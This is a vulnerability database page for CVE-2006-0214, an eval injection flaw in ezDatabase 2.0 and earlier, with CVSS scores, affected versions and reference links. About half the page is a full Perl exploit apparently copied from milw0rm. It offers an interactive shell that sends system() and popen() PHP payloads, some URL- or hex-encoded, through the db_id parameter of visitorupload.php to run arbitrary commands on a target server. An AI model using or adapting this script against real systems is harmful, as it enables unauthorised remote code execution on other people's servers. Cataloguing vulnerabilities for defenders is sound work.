CVE-2006-0214
CVSS 7.5
Published: 2006-01-15 06:03:00
Last revised: 2008-09-20 00:45:22

[Original] Eval injection vulnerability in ezDatabase 2.0 and earlier allows remote attackers to execute arbitrary PHP code via the db_id parameter to visitorupload.php, as demonstrated using phpinfo and include function calls.


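[CNNVD] EZDatabase eval injection vulnerability (CNNVD-200601-153)

        An eval injection vulnerability exists in ezDatabase 2.0 and earlier. Remote attackers can execute arbitrary PHP code via the db_id parameter of visitorupload.php, as demonstrated using phpinfo and include function calls.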

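- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]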

- CPE (affected platforms and products)

cpe:/a:indexcor:ezdatabase:2.1.2
cpe:/a:indexcor:ezdatabase:2.0

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0214
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0214
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200601-153
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/24136
(UNKNOWN)  XF  ezdatabase-visitorupload-file-include(24136)
http://www.securityfocus.com/bid/16237
(UNKNOWN)  BID  16237
http://securityreason.com/securityalert/351
(UNKNOWN)  SREASON  351
http://secunia.com/advisories/18043
(UNKNOWN)  SECUNIA  18043
http://pridels0.blogspot.com/2006/01/ezdatabase-20-and-below.html
(UNKNOWN)  MISC  http://pridels0.blogspot.com/2006/01/ezdatabase-20-and-below.html

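- Vulnerability information

EZDatabase eval injection vulnerability
High risk  Input validation
2006-01-15 00:00:00 2006-01-16 00:00:00
Remote
        An eval injection vulnerability exists in ezDatabase 2.0 and earlier. Remote attackers can execute arbitrary PHP code via the db_id parameter of visitorupload.php, as demonstrated using phpinfo and include function calls.

- Advisories and patches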

        

- Vulnerability information (1442)

ezDatabase <= 2.0 (db_id) Remote Command Execution Exploit (EDBID:1442)
php webapps
2006-01-22 Verified
0 cijfer
N/A
#!/usr/bin/perl
#
# ezDatabase Remote Command Execution Exploit
# based on advisory by Pridels Team
#
# Copyright (c) 2006 cijfer <cijfer@netti!fi>
# All rights reserved.
#
# never ctrl+c again.
# cijfer$ http://target.com/dir
# host changed to 'http://target.com/dir'
# cijfer$ 
#
# $Id: cijfer-ezdbxpl.pl,v 0.1 2006/01/21 019:22:00 cijfer Exp $

use LWP::UserAgent;
use URI::Escape;
use Getopt::Long;
use Term::ANSIColor;

$res  = GetOptions("host=s" => \$host, "proxy=s" => \$proxy, "verbose+" => \$verbose);
&usage unless $host;

while()
{
	print color("green"), "cijfer\$ ", color("reset");
	chomp($command = <STDIN>);
	exit unless $command;
	if($command =~ m/^http\:\/\/(.*)/g)
	{
		$host="http://".$1;
		print "host changed to '";
		print color("bold"), $host."'\n", color("reset");
	}
	&exploit($command,$host);
}

sub usage
{
	print "ezDatabase Remote Command Execution Exploit\n";
	print "Usage: $0 -hp [OPTION]...\n\n";
	print "  -h --host\tfull address of target (ex. http://www.website.com/directory)\n";
	print "  -p --proxy\tprovide an HTTP proxy (ex. 0.0.0.0:8080)\n";
	print "  -v --verbose\tverbose mode\n\n";
	exit;
}

sub exploit
{
	my($command,$host) = @_;

	$cij=LWP::UserAgent->new() or die;
	$cij->agent("Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:2.0) Gecko/20060101");
	$cij->proxy("http", "http://".$tunnel."/") unless !$proxy;

	$string  = "%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F%3B";
	$string .= uri_escape(shift);
	$string .= "%3B%20%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F";
	$execut  = "%3C%3F%24%68%61%6E%64%6C%65%3D%70%6F%70%65%6E";
	$execut .= "%5C%28%24%5F%47%45%54%5B%63%69%6A%5D%2C%22%72";
	$execut .= "%22%29%3B%77%68%69%6C%65%28%21%66%65%6F%66%28";
	$execut .= "%24%68%61%6E%64%6C%65%29%29%7B%24%6C%69%6E%65";
	$execut .= "%3D%66%67%65%74%73%28%24%68%61%6E%64%6C%65%29";
	$execut .= "%3B%69%66%28%73%74%72%6C%65%6E%28%24%6C%69%6E";
	$execut .= "%65%29%3E%3D%31%29%7B%65%63%68%6F%22%24%6C%69";
	$execut .= "%6E%65%22%3B%7D%7D%70%63%6C%6F%73%65%28%24%68";
	$execut .= "%61%6E%64%6C%65%29%3B%3F%3E";

	$out=$cij->get($host."/visitorupload.php?db_id=%3b%73%79%73%74%65%6d%28%24%5f%47%45%54%5b%63%6d%64%5d%29&cmd=".$string);

	if($out->is_success)
	{
		@cij=split("_cijfer_",$out->content);
		print substr(@cij[1],1);
	}
	if($verbose)
	{
		$recv=length $out->content;
		print "Total received bytes: ".$recv."\n";
		$sent=length $command;
		print "Total sent bytes: ".$sent."\n";
	}
}

# milw0rm.com [2006-01-22]
		

- Vulnerability information

22683
ezDatabase visitorupload.php db_id Variable Arbitrary PHP Command Execution
Remote / Network Access
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-01-14 Unknown
2006-01-14 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
